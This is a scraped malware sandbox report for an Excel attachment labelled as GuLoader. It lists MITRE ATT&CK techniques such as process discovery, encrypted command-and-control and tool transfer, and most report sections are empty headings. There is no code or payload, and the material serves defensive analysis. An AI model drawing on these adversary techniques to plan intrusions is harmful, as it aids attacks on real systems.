Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report new order no. Hc511 for sept.xlsx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

Exploits:

System Summary:

Jbx Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: EXCEL.EXE PID: 3028 Parent PID: 596

General

Chronological Activities

Function 00401574, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 295
COMMONCrypto